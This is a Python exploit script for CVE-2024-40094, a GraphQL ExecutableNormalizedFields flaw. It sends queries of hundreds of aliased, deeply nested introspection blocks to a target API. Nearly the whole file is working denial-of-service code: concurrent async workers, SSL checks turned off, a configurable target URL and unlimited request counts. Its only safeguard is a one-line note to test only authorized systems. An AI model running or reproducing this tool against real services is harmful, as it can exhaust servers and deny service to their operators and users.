# CVE-2024-40094 exploit
# ExecutableNormalizedFields (ENF)
#
# Only run this against systems you own or are explicitly authorized to test.
import argparse
import asyncio
import logging
import time
from typing import Dict, Optional

import aiohttp
import urllib3

# Disable SSL verification warnings if using self-signed certificates
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)

# Default configuration
DEFAULT_URL = "https://api.example.com/graphql"
DEFAULT_HEADERS = {
    "Host": "api.example.com",
    "Authorization": "Bearer ",
    "Content-Type": "application/json",
}

# Number of concurrent jobs (similar to threads)
# Each job will be a coroutine
# Use a conservative default to avoid overwhelming the target by accident.
DEFAULT_JOB_COUNT = 50

# Number of repeated alias blocks in the query (depth of stress on the server)
DEFAULT_ALIAS_COUNT = 500

# Delay between requests (in seconds)
DEFAULT_REQUEST_DELAY = 0.0

# Maximum number of requests each job sends (for clean shutdown)
# Set to None for an unlimited number of requests
DEFAULT_MAX_REQUESTS_PER_JOB = 1000

# Optional log file for recording outputs
LOG_FILE = "enf_attack_async.log"

# Logger used by workers
logger = logging.getLogger(__name__)


def build_enf_query(alias_count: int) -> str:
    """Build the introspection query text with repeated aliased blocks.

    The same nested ``__schema`` selection is emitted ``alias_count`` times,
    each under its own alias (``alias1`` .. ``aliasN``), inside a single
    ``query ENF_Exploit`` operation.

    Args:
        alias_count: Number of aliased copies of the nested block. Values
            below 1 yield an operation with an empty selection set.

    Returns:
        The GraphQL query document as a string.
    """
    nested_block = """
    __schema {
      types {
        name
        fields {
          name
          type {
            name
            fields {
              name
              type {
                name
                fields {
                  name
                }
              }
            }
          }
        }
      }
    }
    """
    aliases = "".join(
        f"alias{index}:{nested_block}" for index in range(1, alias_count + 1)
    )
    return f"""
    query ENF_Exploit {{
        {aliases}
    }}
    """


async def worker(
    session: aiohttp.ClientSession,
    worker_id: int,
    semaphore: asyncio.BoundedSemaphore,
    url: str,
    alias_count: int,
    request_delay: float,
    max_requests: Optional[int],
) -> None:
    """Send sequential POST requests until the request limit or an error.

    Args:
        session: Shared aiohttp session used for every request.
        worker_id: Identifier used only to tag log lines.
        semaphore: Caps how many requests are in flight across all workers.
        url: Endpoint that receives the JSON body ``{"query": ...}``.
        alias_count: Passed to ``build_enf_query``.
        request_delay: Seconds to sleep after each request; values <= 0
            disable the sleep.
        max_requests: Stop after this many requests; ``None`` means no limit.

    The worker stops on the first exception raised while sending or reading
    a response; the exception is logged with its traceback.
    """
    # The query depends only on alias_count, so build it once per worker.
    query = build_enf_query(alias_count)
    requests_sent = 0

    while True:
        # If we have a maximum request limit, stop once it's reached
        if max_requests is not None and requests_sent >= max_requests:
            logger.info("[Worker-%d] Max requests reached. Stopping...", worker_id)
            break

        try:
            async with semaphore:
                # Start timing only after a slot is held so the logged time
                # reflects the request itself, not time spent queued.
                start_time = time.perf_counter()
                # Send the request with the GraphQL query as JSON
                async with session.post(
                    url, json={"query": query}, ssl=False
                ) as resp:
                    status_code = resp.status
                    text = await resp.text()
                elapsed = time.perf_counter() - start_time

            snippet = text[:200].replace("\n", " ")
            logger.info(
                "[Worker-%d] Status: %s, Len: %d, Time: %.2fs, Snippet: %s...",
                worker_id,
                status_code,
                len(text),
                elapsed,
                snippet,
            )
        except Exception as e:
            logger.exception("[Worker-%d] Error: %s", worker_id, e)
            break

        requests_sent += 1

        if request_delay > 0:
            await asyncio.sleep(request_delay)


def configure_logging(log_level: str) -> None:
    """Configure the module logger with a file handler and console output.

    Args:
        log_level: Level name such as ``"DEBUG"`` or ``"info"``
            (case-insensitive). Unrecognized names fall back to INFO.

    Handlers are attached only once, so calling this again just updates the
    level instead of duplicating every log record.
    """
    level = getattr(logging, log_level.upper(), None)
    if not isinstance(level, int):
        # Guards against unknown names and non-level attributes of `logging`.
        level = logging.INFO
    logger.setLevel(level)

    if logger.handlers:
        return

    formatter = logging.Formatter("%(asctime)s [%(levelname)s] %(message)s")

    # Response snippets may contain non-ASCII text; pin the file encoding.
    file_handler = logging.FileHandler(LOG_FILE, encoding="utf-8")
    file_handler.setFormatter(formatter)
    logger.addHandler(file_handler)

    console_handler = logging.StreamHandler()
    console_handler.setFormatter(formatter)
    logger.addHandler(console_handler)


async def main(
    url: str,
    headers: Dict[str, str],
    job_count: int,
    alias_count: int,
    request_delay: float,
    max_requests: Optional[int],
    log_level: str,
    concurrency_limit: int,
) -> None:
    """Launch all jobs (as coroutines), then wait for all jobs to complete.

    Args:
        url: Endpoint passed to every worker.
        headers: Headers set on the shared client session.
        job_count: Number of worker coroutines to start.
        alias_count: Passed through to each worker.
        request_delay: Passed through to each worker.
        max_requests: Passed through to each worker.
        log_level: Level name handed to ``configure_logging``.
        concurrency_limit: Initial value of the shared ``BoundedSemaphore``.
    """
    configure_logging(log_level)
    semaphore = asyncio.BoundedSemaphore(concurrency_limit)

    # It's recommended to use a single ClientSession
    # for optimized connection pooling
    async with aiohttp.ClientSession(headers=headers) as session:
        tasks = [
            asyncio.create_task(
                worker(
                    session,
                    job_id,
                    semaphore,
                    url,
                    alias_count,
                    request_delay,
                    max_requests,
                )
            )
            for job_id in range(job_count)
        ]

        # Wait for all tasks to complete
        await asyncio.gather(*tasks)


def parse_args() -> argparse.Namespace:
    """Parse and validate command-line arguments.

    Returns:
        The parsed namespace, extended with ``headers`` (defaults merged with
        ``--header`` overrides). ``concurrency_limit`` defaults to
        ``job_count`` and ``max_requests`` is ``None`` when 0 was given.

    Invalid values terminate the program through ``parser.error``.
    """
    parser = argparse.ArgumentParser(description="CVE-2024-40094 exploit")
    parser.add_argument("--url", default=DEFAULT_URL, help="Target GraphQL API URL")
    parser.add_argument(
        "--header",
        action="append",
        default=[],
        help="Additional header in 'Key: Value' format. "
        "Can be specified multiple times.",
    )
    parser.add_argument(
        "--job-count",
        type=int,
        default=DEFAULT_JOB_COUNT,
        help="Number of concurrent jobs to spawn.",
    )
    parser.add_argument(
        "--alias-count",
        type=int,
        default=DEFAULT_ALIAS_COUNT,
        help="Number of repeated alias blocks in the query.",
    )
    parser.add_argument(
        "--delay",
        type=float,
        default=DEFAULT_REQUEST_DELAY,
        help="Delay between requests in seconds.",
    )
    parser.add_argument(
        "--max-requests",
        type=int,
        default=DEFAULT_MAX_REQUESTS_PER_JOB,
        help="Maximum number of requests each job sends (0 for unlimited).",
    )
    parser.add_argument(
        "--log-level",
        default="INFO",
        help="Logging level (e.g., DEBUG, INFO, WARNING, ERROR, CRITICAL)",
    )
    parser.add_argument(
        "--concurrency-limit",
        type=int,
        help="Maximum number of simultaneous requests allowed; defaults to --job-count.",
    )

    args = parser.parse_args()

    # Reject values that would otherwise crash later or silently do nothing.
    if args.job_count < 1:
        parser.error(f"--job-count must be at least 1 (got {args.job_count})")
    if args.alias_count < 1:
        parser.error(f"--alias-count must be at least 1 (got {args.alias_count})")
    if args.max_requests < 0:
        parser.error(
            f"--max-requests must be 0 (unlimited) or positive (got {args.max_requests})"
        )

    # Build headers from defaults and CLI overrides
    headers: Dict[str, str] = dict(DEFAULT_HEADERS)
    for header in args.header:
        key, separator, value = header.partition(":")
        key = key.strip()
        if not separator or not key:
            parser.error(f"Invalid header format: {header}")
        headers[key] = value.strip()
    args.headers = headers

    if args.concurrency_limit is None:
        args.concurrency_limit = args.job_count

    # NOTE(review): this forces the limit to be >= the job count, which means
    # the semaphore never actually throttles. Kept as-is; confirm intent.
    if args.job_count > args.concurrency_limit:
        parser.error(
            f"--job-count ({args.job_count}) exceeds --concurrency-limit ({args.concurrency_limit})"
        )

    if args.max_requests == 0:
        args.max_requests = None

    return args


if __name__ == "__main__":
    args = parse_args()
    try:
        asyncio.run(
            main(
                args.url,
                args.headers,
                args.job_count,
                args.alias_count,
                args.delay,
                args.max_requests,
                args.log_level,
                args.concurrency_limit,
            )
        )
    except KeyboardInterrupt:
        logger.info("KeyboardInterrupt received. Shutting down...")